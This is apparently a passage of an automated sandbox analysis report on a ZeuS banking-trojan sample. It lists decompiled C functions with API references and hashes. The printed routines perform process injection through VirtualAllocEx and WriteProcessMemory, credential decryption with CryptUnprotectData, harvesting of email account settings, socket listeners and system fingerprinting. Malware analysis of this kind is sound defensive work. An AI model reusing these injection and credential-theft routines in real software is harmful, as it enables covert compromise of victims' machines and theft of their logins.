					_t104 = 4;
					_t99 = E0040AAE7(_t111, _t104);
					goto L16;
				}
				_t92 = E0041CC4A(_t106,  &_v556);
				_t106 =  &_v552;
				_t99 = E0040AB94(_t92,  &_v552, _t109, __eflags, _t111, 0x2711);
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				_t95 = E0041CDA8( &_v552,  &_v64);
				__eflags = _v64;
				if(__eflags != 0) {
					_t106 =  &_v64;
					_t99 = E0040AB94(_t95,  &_v64, _t109, __eflags, _t111, 0x2712);
				}
				__eflags = _t99;
				if(_t99 == 0) {
					goto L11;
				}
				goto L9;
			}

0x00417ddc
0x00417ddc
0x00417de7
0x00417dea
0x00417dee
0x00417df0
0x00417df4
0x00417df6
0x00417dfb
0x00417dff
0x00000000
0x00417e01
0x00417e08
0x00417e08
0x00417e0c
0x00417e15
0x00417e5e
0x00417e5e
0x00417e62
0x00417e67
0x00417e68
0x00417e69
0x00417e70
0x00417e73
0x00417e7f
0x00417e7f
0x00417e81
0x00417e81
0x00417e85
0x00417efa
0x00417efa
0x00417efc
0x00417fff
0x00417fff
0x00418003
0x00418007
0x0041800c
0x0041800c
0x0041800c
0x0041800f
0x00000000
0x0041800f
0x00417f02
0x00417f06
0x00417f54
0x00417f54
0x00417f56
0x00000000
0x00000000
0x00417f5c
0x00417f60
0x00417fe0
0x00417fe0
0x00417fe2
0x00000000
0x00000000
0x00417fe4
0x00417fe8
0x00417fed
0x00417ff5
0x00417ff5
0x00000000
0x00417fe8
0x00417f70
0x00417f76
0x00417f79
0x00417f7b
0x00417f7d
0x00417f84
0x00417f8d
0x00417f98
0x00417f98
0x00417f9a
0x00417fa1
0x00417fa3
0x00000000
0x00417fa5
0x00417fa9
0x00417fb2
0x00417fb8
0x00417fba
0x00417fbc
0x00417fbf
0x00417fc1
0x00417fc3
0x00417fca
0x00417fd3
0x00417fde
0x00417fde
0x00417fc1
0x00000000
0x00417fba
0x00417fa3
0x00417f08
0x00417f0b
0x00417f12
0x00417f16
0x00417f17
0x00417f1e
0x00417f1f
0x00417f24
0x00417f26
0x00417f28
0x00417ffc
0x00000000
0x00417ffc
0x00417f2e
0x00417f37
0x00417f3d
0x00417f41
0x00417f42
0x00417f49
0x00417f4a
0x00417f4f
0x00417f52
0x00000000
0x00417f52
0x00417e87
0x00417e89
0x00000000
0x00000000
0x00417e94
0x00417e9a
0x00417e9b
0x00417e9c
0x00417ea3
0x00417eab
0x00417ead
0x00417eaf
0x00000000
0x00000000
0x00417eba
0x00417ec0
0x00417ec1
0x00417ec2
0x00417ec9
0x00417ed1
0x00417ed3
0x00417ed5
0x00000000
0x00000000
0x00417ee1
0x00417ee7
0x00417ee8
0x00417ee9
0x00417ef0
0x00417ef8
0x00000000
0x00417ef8
0x00417e1e
0x00417e29
0x00417e34
0x00417e36
0x00417e38
0x00000000
0x00000000
0x00417e3e
0x00417e43
0x00417e48
0x00417e50
0x00417e58
0x00417e58
0x00417e5a
0x00417e5c
0x00000000
0x00000000
0x00000000

APIs

GetTickCount.KERNEL32 ref: 00417EDB
GetUserDefaultUILanguage.KERNEL32(0000271C,00020000,?,00000000,?,00000000), ref: 00417F2E
GetModuleFileNameW.KERNEL32(00000000,?,00000103,00000000,?,00000000), ref: 00417F70
GetUserNameExW.SECUR32(00000002,?,00000104), ref: 00417FB2

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: NameUser$CountDefaultFileLanguageModuleTick
String ID:
API String ID: 2256650695-0
Opcode ID: ce964bb8074c06ca9a7ddb01b19f9ca34787c350bbbef252c669d90c4ce68a2c
Instruction ID: 56d4efdc3125b8e07167e228e35abe2e66abe79878b361b1d2cd1bde50609566
Opcode Fuzzy Hash: ce964bb8074c06ca9a7ddb01b19f9ca34787c350bbbef252c669d90c4ce68a2c
Instruction Fuzzy Hash: 0751B4326843487ADB11DB65D849BDF3BB89F05348F08405AF945AF2C2DB789AC9CB58

Uniqueness

Uniqueness Score: -1.00%

Function 00409B46, Relevance: 6.1, APIs: 4, Instructions: 94
memoryinjectionCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409B46(void* __eax, void* _a4) {
				char _v5;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				long _v24;
				void* _t37;
				void* _t42;
				intOrPtr* _t43;
				int _t44;
				long _t46;
				void* _t47;
				SIZE_T* _t48;
				signed int _t50;
				void* _t52;
				void* _t54;
				void* _t55;
				void* _t60;
				intOrPtr _t61;
				intOrPtr _t62;
				unsigned int _t64;

				_t55 = __eax;
				_t60 =  *((intOrPtr*)(__eax + 0x3c)) + __eax;
				_t46 =  *(_t60 + 0x50);
				_v24 = _t46;
				_v5 = 0;
				if(IsBadReadPtr(__eax, _t46) == 0) {
					_t37 = VirtualAllocEx(_a4, 0, _t46, 0x3000, 0x40);
					_v12 = _t37;
					__eflags = _t37;
					if(__eflags == 0) {
						L17:
						return _v12;
					}
					_t47 = E00405239(__eflags, _t55, _t46);
					_t48 = 0;
					__eflags = _t47;
					if(_t47 == 0) {
						L16:
						VirtualFreeEx(_a4, _v12, 0, 0x8000);
						_t32 =  &_v12;
						 *_t32 = _v12 & 0x00000000;
						__eflags =  *_t32;
						goto L17;
					}
					__eflags =  *(_t60 + 0xa4);
					if( *(_t60 + 0xa4) <= 0) {
						L15:
						E004051E6(_t47);
						__eflags = _v5;
						if(_v5 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t42 =  *(_t60 + 0xa0);
					__eflags = _t42;
					if(_t42 <= 0) {
						goto L15;
					}
					_t61 =  *((intOrPtr*)(_t60 + 0x34));
					_t54 = _v12 - _t61;
					_v20 = _t55 - _t61;
					_t43 = _t42 + _t47;
					while(1) {
						__eflags =  *_t43 - _t48;
						if( *_t43 == _t48) {
							break;
						}
						_t62 =  *((intOrPtr*)(_t43 + 4));
						__eflags = _t62 - 8;
						if(_t62 < 8) {
							L12:
							_t43 = _t43 +  *((intOrPtr*)(_t43 + 4));
							_t48 = 0;
							__eflags = 0;
							continue;
						}
						_t64 = _t62 + 0xfffffff8 >> 1;
						__eflags = _t64;
						_v16 = _t48;
						if(_t64 == 0) {
							goto L12;
						} else {
							goto L9;
						}
						do {
							L9:
							_t50 =  *(_t43 + 8 + _v16 * 2) & 0x0000ffff;
							__eflags = _t50;
							if(_t50 != 0) {
								_t52 = (_t50 & 0x00000fff) +  *_t43;
								_t19 = _t52 + _t47;
								 *_t19 =  *(_t52 + _t47) + _t54 - _v20;
								__eflags =  *_t19;
							}
							_v16 = _v16 + 1;
							__eflags = _v16 - _t64;
						} while (_v16 < _t64);
						goto L12;
					}
					_t44 = WriteProcessMemory(_a4, _v12, _t47, _v24, _t48);
					__eflags = _t44;
					_t28 =  &_v5;
					 *_t28 = _t44 != 0;
					__eflags =  *_t28;
					goto L15;
				}
				return 0;
			}

0x00409b4f
0x00409b54
0x00409b56
0x00409b5b
0x00409b5e
0x00409b6a
0x00409b80
0x00409b86
0x00409b89
0x00409b8b
0x00409c41
0x00000000
0x00409c41
0x00409b98
0x00409b9a
0x00409b9c
0x00409b9e
0x00409c2a
0x00409c37
0x00409c3d
0x00409c3d
0x00409c3d
0x00000000
0x00409c3d
0x00409ba4
0x00409baa
0x00409c1e
0x00409c1f
0x00409c24
0x00409c28
0x00000000
0x00000000
0x00000000
0x00409c28
0x00409bac
0x00409bb2
0x00409bb4
0x00000000
0x00000000
0x00409bb6
0x00409bbe
0x00409bc0
0x00409bc3
0x00409c03
0x00409c03
0x00409c05
0x00000000
0x00000000
0x00409bc7
0x00409bca
0x00409bcd
0x00409bfe
0x00409bfe
0x00409c01
0x00409c01
0x00000000
0x00409c01
0x00409bd2
0x00409bd2
0x00409bd4
0x00409bd7
0x00000000
0x00000000
0x00000000
0x00000000
0x00409bd9
0x00409bd9
0x00409bdc
0x00409be1
0x00409be4
0x00409bec
0x00409bf3
0x00409bf3
0x00409bf3
0x00409bf3
0x00409bf6
0x00409bf9
0x00409bf9
0x00000000
0x00409bd9
0x00409c12
0x00409c18
0x00409c1a
0x00409c1a
0x00409c1a
0x00000000
0x00409c1a
0x00000000

APIs

IsBadReadPtr.KERNEL32(?,?,00000000,?,00000000,?,00000000,?,74B5F560,00000000), ref: 00409B62
VirtualAllocEx.KERNEL32(74B5F560,00000000,?,00003000,00000040,?,74B5F560,00000000), ref: 00409B80
WriteProcessMemory.KERNEL32(74B5F560,74B5F560,00000000,?,00000000,?,?,?,74B5F560,00000000), ref: 00409C12
VirtualFreeEx.KERNEL32(74B5F560,74B5F560,00000000,00008000,?,?,?,74B5F560,00000000), ref: 00409C37

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Virtual$AllocFreeMemoryProcessReadWrite
String ID:
API String ID: 1273498236-0
Opcode ID: a8e148c3872002994075ac7d6953eb160bd0503fb9323fcfe4cf76e36bb8b84f
Instruction ID: 3e0b5556d31203645c610b9b14c5460fe23f44edf1fdd2a7e7d811e6d5866f3c
Opcode Fuzzy Hash: a8e148c3872002994075ac7d6953eb160bd0503fb9323fcfe4cf76e36bb8b84f
Instruction Fuzzy Hash: B8318B72E04209AFDF148FA4CD84BAEBBB4EF45755F04407AE542B72A2C774AD408B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040685B, Relevance: 6.0, APIs: 4, Instructions: 36
threadprocessCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0040685B(intOrPtr _a4) {
				intOrPtr _v20;
				void* _v32;
				signed int _t6;
				signed int _t7;
				int _t9;
				int _t14;
				void* _t15;

				_t14 = 0;
				_t6 = CreateToolhelp32Snapshot(4, 0);
				_t15 = _t6;
				_t7 = _t6 | 0xffffffff;
				if(_t15 != _t7) {
					_v32 = 0x1c;
					_t9 = Thread32First(_t15,  &_v32);
					while(_t9 != 0) {
						if(_v20 == _a4) {
							_t14 = _t14 + 1;
						}
						_t9 = Thread32Next(_t15,  &_v32);
					}
					CloseHandle(_t15);
					return _t14;
				}
				return _t7;
			}

0x00406863
0x00406868
0x0040686e
0x00406870
0x00406875
0x0040687c
0x00406883
0x0040689f
0x00406891
0x00406893
0x00406893
0x00406899
0x00406899
0x004068a4
0x00000000
0x004068aa
0x004068af

APIs

CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 00406868
Thread32First.KERNEL32 ref: 00406883
Thread32Next.KERNEL32 ref: 00406899
CloseHandle.KERNEL32(00000000), ref: 004068A4

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Thread32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 3643885135-0
Opcode ID: 5da51fc52ac16c3558defbd347f8b68f3c28b4b8fc23aa3618eac1f42ae9a567
Instruction ID: 5dad353f2e628ab1bc57de377b852eaaebbeb0c9e8b27586ceb2107e512fe895
Opcode Fuzzy Hash: 5da51fc52ac16c3558defbd347f8b68f3c28b4b8fc23aa3618eac1f42ae9a567
Instruction Fuzzy Hash: E6F054725011156BDB20BB659D48DEF7BBCEB81351B014136F912F21D0D738990286B9

Uniqueness

Uniqueness Score: -1.00%

Function 00408328, Relevance: 6.0, APIs: 4, Instructions: 32networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000001,00000006), ref: 00408331
bind.WS2_32(00000000,?,-0000001D), ref: 00408351
listen.WS2_32(00000000,?), ref: 00408360
closesocket.WS2_32(00000000), ref: 0040836B

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: bindclosesocketlistensocket
String ID:
API String ID: 952684215-0
Opcode ID: 23739be4b83d4a1828e01b8661f37a6f06606f36c84d1a26d6dd5267437d6947
Instruction ID: f6a5cc976e980c2e4ec193b90207d16f107318b56e2c4f7d03876008abe50fd5
Opcode Fuzzy Hash: 23739be4b83d4a1828e01b8661f37a6f06606f36c84d1a26d6dd5267437d6947
Instruction Fuzzy Hash: 23F0373260051176D2201F399D4EE2F35A9ABD5BB1B144729F9A2E61F0E739C4919528

Uniqueness

Uniqueness Score: -1.00%

Function 00408606, Relevance: 4.5, APIs: 3, Instructions: 27networkCOMMON

Download Yara Rule

APIs

socket.WS2_32(00000000,00000002,00000011), ref: 0040860F
bind.WS2_32(00000000,00000017,-0000001D), ref: 0040862F
closesocket.WS2_32(00000000), ref: 0040863A

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: bindclosesocketsocket
String ID:
API String ID: 1873677229-0
Opcode ID: a411278c13ec25d2be8f82db56022a938fdf60c5b12948c3625449591d195d6f
Instruction ID: b60880ae88efab1d2fcdd3b7002458712cdaf25713cc029af2067e513ce96f1c
Opcode Fuzzy Hash: a411278c13ec25d2be8f82db56022a938fdf60c5b12948c3625449591d195d6f
Instruction Fuzzy Hash: 75E0483220051066D2201B39EE4EE2F25A99BC67B17154729F9B2E62E1E77889819524

Uniqueness

Uniqueness Score: -1.00%

Function 004130AB, Relevance: 3.2, APIs: 2, Instructions: 162
encryptionCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E004130AB(void* __eax, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				char _v5;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v44;
				signed int _v48;
				void* _v52;
				char _v56;
				char _v72;
				void* _v96;
				char _v196;
				void* __ebx;
				void* __esi;
				intOrPtr _t48;
				intOrPtr _t50;
				intOrPtr _t52;
				intOrPtr _t54;
				signed int _t65;
				void* _t66;
				void* _t68;
				char* _t70;
				intOrPtr _t77;
				signed int* _t82;
				intOrPtr _t95;
				void* _t97;
				signed int _t100;
				void* _t107;
				void* _t109;
				intOrPtr _t115;
				char* _t117;
				void* _t129;

				_t121 = __eflags;
				_t115 = _a4;
				_push(_t115);
				_t92 = __eax;
				_t48 = E00413058(__eax, __eflags, 0x4c);
				_push(_t115);
				_v20 = _t48;
				_t50 = E00413058(_t92, _t121, 0x4f);
				_push(_t115);
				_v24 = _t50;
				_t52 = E00413058(_t92, _t121, 0x50);
				_push(_t115);
				_v28 = _t52;
				_t54 = E00413058(_t92, _t121, 0x4d);
				_push(_t115);
				_v36 = _t54;
				_v12 = E00413058(_t92, _t121, 0x4e);
				_v5 = _v20 != 0;
				if(_v5 != 0) {
					_t95 = _v12;
					_t65 = E00405D35(_t95);
					if(_t95 != 0 && _t65 > 1) {
						_t100 = _t65 & 0x80000001;
						if(_t100 < 0) {
							_t129 = (_t100 - 0x00000001 | 0xfffffffe) + 1;
						}
						if(_t129 == 0) {
							asm("cdq");
							_v48 = _t65 - _t107 >> 1;
							_t77 = E004051B6(_t65 - _t107 >> 1);
							_v44 = _t77;
							if(_t77 != 0) {
								if(E00405A23(_v12, _t77) != 0) {
									_t82 =  &_v48;
									__imp__CryptUnprotectData(_t82, 0, _a8, 0, 0, 0,  &_v56);
									if(_t82 == 1) {
										_v16 = E004055A2(_v52);
										LocalFree(_v52);
									}
								}
								E004051E6(_v44);
							}
						}
					}
					_t66 = 0x4b;
					E0040F34A(_t66,  &_v196);
					_t117 =  &_v72;
					_t68 = 0x54;
					E0040F34A(_t68, _t117);
					_t70 = 0x4030e8;
					_t109 =  ==  ? 0x4030e8 : _v16;
					_t97 =  ==  ? 0x4030e8 : _v36;
					_t135 = _v32;
					if(_v32 != 0) {
						_t70 = _t117;
					}
					_push(_t109);
					_push(_t97);
					_push(_t70);
					_push(_v20);
					E00405F67(_a12, E00405D35( *_a12),  *_a12, _t135,  &_v196, _a4);
					_t56 = E004051E6(_v16);
				}
				E0040B780(E0040B780(E0040B780(E0040B780(E0040B780(_t56, _v20), _v24), _v28), _v36), _v12);
				return _v5;
			}

0x004130ab
0x004130b6
0x004130b9
0x004130bc
0x004130bf
0x004130c4
0x004130c7
0x004130cb
0x004130d0
0x004130d3
0x004130d7
0x004130dc
0x004130df
0x004130e3
0x004130e8
0x004130eb
0x004130f9
0x004130fc
0x00413103
0x0041314f
0x00413152
0x00413159
0x00413162
0x00413168
0x0041316e
0x0041316e
0x0041316f
0x00413171
0x00413176
0x00413179
0x0041317e
0x00413183
0x00413191
0x0041319d
0x004131a2
0x004131ab
0x004131bb
0x004131be
0x004131be
0x004131ab
0x004131c7
0x004131c7
0x00413183
0x0041316f
0x004131d4
0x004131d5
0x004131dc
0x004131df
0x004131e0
0x004131ed
0x004131f2
0x004131f7
0x004131fa
0x004131fd
0x004131ff
0x004131ff
0x00413201
0x00413205
0x00413208
0x0041320a
0x00413220
0x0041322b
0x00413230
0x00413254
0x0041325f

APIs

CryptUnprotectData.CRYPT32(?,00000000,?,00000000,00000000,00000000,?), ref: 004131A2
LocalFree.KERNEL32(?,?,?,?), ref: 004131BE

Part of subcall function 004051E6: HeapFree.KERNEL32(00000000,00000000,004069DD,00000000,?,?,?,0041C28A,00000000,0041C766), ref: 004051F9

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Free$CryptDataHeapLocalUnprotect
String ID:
API String ID: 2231100991-0
Opcode ID: 23284d3b6dd1d09cbdc4bc9a1756c292a2031c46c05ce055b0cdae9f6deb1245
Instruction ID: 2bb16e14e0ebea8dc4c48697bd6f958f0574d658446bd80e6efa9956895ba0c8
Opcode Fuzzy Hash: 23284d3b6dd1d09cbdc4bc9a1756c292a2031c46c05ce055b0cdae9f6deb1245
Instruction Fuzzy Hash: 43517E71E00219BADF10AFE5CC469EEBB75EF48315F10443AF614F7291D6389E858B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041C007, Relevance: 3.0, APIs: 2, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 61%

			E0041C007(char* __esi) {
				void* _v40;
				short _v46;
				signed char _v48;
				struct _OSVERSIONINFOW _v324;
				void* _t13;
				int _t16;
				signed int _t20;
				short _t24;
				char* _t25;

				_t25 = __esi;
				E00405299(_t13, __esi, 0, 6);
				_v324.dwOSVersionInfoSize = 0x11c;
				_t16 = GetVersionExW( &_v324);
				if(_t16 != 0) {
					__imp__GetNativeSystemInfo( &_v40);
					 *__esi = E0041BF31();
					if(_v48 > 0xff || _v46 != 0) {
						_t20 = 0;
					} else {
						_t20 = _v48 & 0x000000ff;
					}
					 *(_t25 + 1) = _t20;
					asm("sbb eax, eax");
					 *((short*)(_t25 + 2)) =  !0xffff & _v324.dwBuildNumber;
					_t24 = _v40;
					 *((short*)(_t25 + 4)) = _t24;
					return _t24;
				}
				return _t16;
			}

0x0041c007
0x0041c015
0x0041c021
0x0041c02b
0x0041c033
0x0041c039
0x0041c044
0x0041c04f
0x0041c05e
0x0041c058
0x0041c058
0x0041c058
0x0041c060
0x0041c06e
0x0041c078
0x0041c07c
0x0041c080
0x00000000
0x0041c080
0x0041c085

APIs

GetVersionExW.KERNEL32(?,?,00000000,00000006), ref: 0041C02B
GetNativeSystemInfo.KERNEL32(?), ref: 0041C039

Part of subcall function 0041BF31: GetVersionExW.KERNEL32(?,74B04EE0), ref: 0041BF50

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: Version$InfoNativeSystem
String ID:
API String ID: 2518960133-0
Opcode ID: cb25316e244f3879dbc0b467220055ee2758aadc6ad11637998de5dd51a3378e
Instruction ID: 6de3f85ac85499b8b4968ab66376158d07fdbc5b1c588c5b3caa2bcaf055519f
Opcode Fuzzy Hash: cb25316e244f3879dbc0b467220055ee2758aadc6ad11637998de5dd51a3378e
Instruction Fuzzy Hash: 5A0162349402498ADB31DFA5CD417EEB7F4AF09700F0080AAE168F3691E779DA84CB69

Uniqueness

Uniqueness Score: -1.00%

Function 00412E07, Relevance: 1.7, APIs: 1, Instructions: 209
comCOMMON

Download Yara Rule

C-Code - Quality: 81%

			E00412E07() {
				void* _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				void* _v28;
				void* _v32;
				char _v44;
				char _v56;
				char _v68;
				char _v132;
				void* _v388;
				void* _v644;
				void* __ebx;
				void* __edi;
				void* __esi;
				char* _t60;
				intOrPtr* _t69;
				intOrPtr* _t71;
				signed int _t72;
				intOrPtr* _t73;
				intOrPtr* _t75;
				signed int _t76;
				intOrPtr* _t80;
				signed int _t81;
				void* _t85;
				void* _t87;
				void* _t91;
				void* _t94;
				void* _t100;
				void* _t106;
				intOrPtr* _t112;
				signed int _t114;
				intOrPtr _t122;
				void* _t123;
				void* _t130;
				void* _t132;
				intOrPtr* _t133;
				intOrPtr* _t136;
				void* _t141;

				_t60 =  &_v32;
				_t114 = 0;
				_v32 = 0;
				__imp__CoCreateInstance(0x4049e8, 0, 0x4401, 0x4049f8, _t60);
				if(_t60 != 0) {
					L3:
					_v20 = _t114;
					_t133 = _t114;
					L4:
					if(_t133 == _t114) {
						return _t60;
					}
					_push(1);
					_push(_t114);
					_push(_t133);
					_v12 = _t114;
					if( *((intOrPtr*)( *_t133 + 0x40))() != 0) {
						L33:
						 *((intOrPtr*)( *_t133 + 8))(_t133);
						_push(0xcc);
						return E0041293E(_t126, _v12, 0x3e);
					}
					_push( &_v28);
					_push(0xe);
					_push(_t133);
					if( *((intOrPtr*)( *_t133 + 0x14))() != 0) {
						goto L33;
					}
					while(1) {
						_t69 = _v28;
						_t126 =  &_v8;
						_push( &_v8);
						_push(_t69);
						if( *((intOrPtr*)( *_t69 + 0x14))() != 0) {
							break;
						}
						_t71 = _v8;
						_t72 =  *((intOrPtr*)( *_t71 + 0x38))(_t71,  &_v16);
						__eflags = _t72;
						if(_t72 == 0) {
							__eflags = _v16 - _t114;
							if(_v16 != _t114) {
								_t75 = _v8;
								_t76 =  *((intOrPtr*)( *_t75 + 0x14))(_t75, 0x123503f0,  &_v388, 0x100);
								__eflags = _t76;
								if(_t76 == 0) {
									__eflags =  &_v388 | 0xffffffff;
									_v24 = E00405426( &_v388 | 0xffffffff, _t114,  &_v388);
								} else {
									_v24 = _t114;
								}
								_t80 = _v8;
								_t81 =  *((intOrPtr*)( *_t80 + 0x14))(_t80, 0x143203f0,  &_v644, 0x100);
								__eflags = _t81;
								if(_t81 == 0) {
									__eflags =  &_v644 | 0xffffffff;
									_t132 = E00405426( &_v644 | 0xffffffff, _t114,  &_v644);
								} else {
									_t132 = 0;
								}
								_t85 = 0x4a;
								E0040F34A(_t85,  &_v132);
								_t87 = 0x4030e8;
								_t130 = 0x4030e8;
								__eflags = _t132 - _t114;
								if(_t132 != _t114) {
									_t130 = _t132;
								}
								_t122 = _v24;
								_t136 = _v12;
								__eflags = _t122 - _t114;
								_t123 =  ==  ? _t87 : _t122;
								__eflags = _t136 - _t114;
								if(_t136 != _t114) {
									__eflags =  *_t136 - _t114;
									if( *_t136 != _t114) {
										_t87 = 0x404a58;
									}
								}
								_push(_t130);
								_push(_t123);
								_t91 = E00405F67( &_v12, E00405D35(_t136), _t136, __eflags,  &_v132, _t87);
								_t141 = _t141 + 0x10;
								E004051E6(_v24);
								E004051E6(_t132);
								__eflags = _t91 - 0xffffffff;
								if(_t91 == 0xffffffff) {
									_t30 =  &_v16;
									 *_t30 = _v16 & 0x00000000;
									__eflags =  *_t30;
								}
								__eflags = _v16 & 0x00000002;
								if((_v16 & 0x00000002) != 0) {
									_t106 = 0x53;
									E0040F34A(_t106,  &_v68);
									E00412CC7(_v8,  &_v68, 0x129803f0, 0x129d03e9, 0x129e03f5, 0x129903f0, 0x129a03f6,  &_v12);
								}
								__eflags = _v16 & 0x00000004;
								if((_v16 & 0x00000004) != 0) {
									_t100 = 0x52;
									E0040F34A(_t100,  &_v56);
									E00412CC7(_v8,  &_v56, 0x13c403f0, 0x13c903e9, 0x13ca03f5, 0x13c503f0, 0x13c603f6,  &_v12);
								}
								__eflags = _v16 & 0x00000008;
								if((_v16 & 0x00000008) != 0) {
									_t94 = 0x51;
									E0040F34A(_t94,  &_v44);
									E00412CC7(_v8,  &_v44, 0x142803f0, 0x142d03e9, 0x142e03f5, 0x142903f0, 0x142a03f6,  &_v12);
								}
								_t133 = _v20;
								_t114 = 0;
								__eflags = 0;
							}
						}
						_t73 = _v8;
						 *((intOrPtr*)( *_t73 + 8))(_t73);
					}
					_t112 = _v28;
					 *((intOrPtr*)( *_t112 + 8))(_t112);
					goto L33;
				}
				_t133 = _v32;
				if(_t133 == 0) {
					goto L3;
				} else {
					_v20 = _t133;
					goto L4;
				}
			}

0x00412e13
0x00412e21
0x00412e29
0x00412e2c
0x00412e34
0x00412e42
0x00412e42
0x00412e45
0x00412e47
0x00412e49
0x00413057
0x00413057
0x00412e51
0x00412e53
0x00412e54
0x00412e55
0x00412e5d
0x0041303d
0x00413040
0x00413046
0x00000000
0x0041304e
0x00412e68
0x00412e69
0x00412e6b
0x00412e71
0x00000000
0x00000000
0x0041301f
0x0041301f
0x00413024
0x00413027
0x00413028
0x0041302e
0x00000000
0x00000000
0x00412e7c
0x00412e86
0x00412e89
0x00412e8b
0x00412e91
0x00412e94
0x00412e9a
0x00412eb2
0x00412eb5
0x00412eb7
0x00412ec6
0x00412ece
0x00412eb9
0x00412eb9
0x00412eb9
0x00412ed1
0x00412ee4
0x00412ee7
0x00412ee9
0x00412ef7
0x00412eff
0x00412eeb
0x00412eeb
0x00412eeb
0x00412f06
0x00412f07
0x00412f0c
0x00412f11
0x00412f13
0x00412f15
0x00412f17
0x00412f17
0x00412f19
0x00412f1c
0x00412f1f
0x00412f21
0x00412f24
0x00412f26
0x00412f28
0x00412f2b
0x00412f2d
0x00412f2d
0x00412f2b
0x00412f32
0x00412f33
0x00412f45
0x00412f4a
0x00412f52
0x00412f58
0x00412f5d
0x00412f60
0x00412f62
0x00412f62
0x00412f62
0x00412f62
0x00412f66
0x00412f6a
0x00412f71
0x00412f72
0x00412f9a
0x00412f9a
0x00412f9f
0x00412fa3
0x00412faa
0x00412fab
0x00412fd3
0x00412fd3
0x00412fd8
0x00412fdc
0x00412fe3
0x00412fe4
0x0041300c
0x0041300c
0x00413011
0x00413014
0x00413014
0x00413014
0x00412e94
0x00413016
0x0041301c
0x0041301c
0x00413034
0x0041303a
0x00000000
0x0041303a
0x00412e36
0x00412e3b
0x00000000
0x00412e3d
0x00412e3d
0x00000000
0x00412e3d

APIs

CoCreateInstance.OLE32(004049E8,00000000,00004401,004049F8,?), ref: 00412E2C

Memory Dump Source

Source File: 00000000.00000002.209100921.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.209097188.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.209116683.0000000000422000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.209120393.0000000000425000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ZeuS.jbxd

Similarity

API ID: CreateInstance
String ID:
API String ID: 542301482-0
Opcode ID: ae9fa143f870d5f5ebd0b3cc597910b4e445582b321c896fc1a5cb8e1a1fe386
